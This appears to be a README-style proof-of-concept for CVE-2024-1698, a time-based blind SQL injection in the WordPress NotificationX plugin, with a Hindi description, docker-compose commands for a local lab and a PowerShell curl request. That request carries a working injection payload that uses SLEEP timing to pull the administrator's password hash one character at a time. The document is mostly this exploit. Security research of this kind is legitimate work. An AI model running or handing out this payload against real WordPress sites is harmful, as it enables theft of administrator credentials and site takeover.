
CVE-2024-1698 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, वर्डप्रेस NotificationX प्लगइन में एक ब्लाइंड SQL इंजेक्शन कमजोरी, जो डेटाबेस से समय-आधारित डेटा निष्कर्षण सक्षम बनाती है।
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}